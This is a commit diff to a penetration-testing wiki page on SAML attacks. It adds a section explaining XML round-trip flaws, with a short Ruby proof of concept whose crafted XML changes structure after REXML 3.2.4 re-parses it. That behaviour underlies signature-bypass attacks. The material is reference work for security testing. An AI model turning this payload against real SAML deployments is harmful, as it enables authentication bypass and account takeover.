GitBook: [master] one page and 2 assets modified

pentesting-web/saml-attacks/README.md

@@ -10,7 +10,48 @@
 
 ## Tool
 
-\*\*\*\*[**SAMLExtractor**](https://github.com/fadyosman/SAMLExtractor): A tool that can take a URL or list of URL and prints back SAML consume URL.
+[**SAMLExtractor**](https://github.com/fadyosman/SAMLExtractor): A tool that can take a URL or list of URL and prints back SAML consume URL.
+
+## XML round-trip
+
+In XML the signed part of the XML is saved in memory, then some encoding/decoding is performed and the signature is checked. Ideally that encoding/decoding shouldn't change the data but based in that scenario, **the data being checked and the original data could not be the same**.
+
+For example, check the following code:
+
+```ruby
+require 'rexml/document'
+
+doc = REXML::Document.new <<XML
+<!DOCTYPE x [ <!NOTATION x SYSTEM 'x">]><!--'> ]>
+<X>
+  <Y/><![CDATA[--><X><Z/><!--]]>-->
+</X>
+XML
+
+puts "First child in original doc: " + doc.root.elements[1].name
+doc = REXML::Document.new doc.to_s
+puts "First child after round-trip: " + doc.root.elements[1].name
+```
+
+Running the program against REXML 3.2.4 or earlier would result in the following output instead:
+
+```text
+First child in original doc: Y
+First child after round-trip: Z
+```
+
+This is how REXML saw the original XML document from the program above:
+
+![](../../.gitbook/assets/image%20%28561%29.png)
+
+And this is how it saw it after a round of parsing and serialization:
+
+![](../../.gitbook/assets/image%20%28560%29.png)
+
+For more information about the vulnerability and how to abuse it:
+
+* [https://mattermost.com/blog/securing-xml-implementations-across-the-web/](https://mattermost.com/blog/securing-xml-implementations-across-the-web/)
+* [https://joonas.fi/2021/08/saml-is-insecure-by-design/](https://joonas.fi/2021/08/saml-is-insecure-by-design/)
 
 ## XML Signature Wrapping Attacks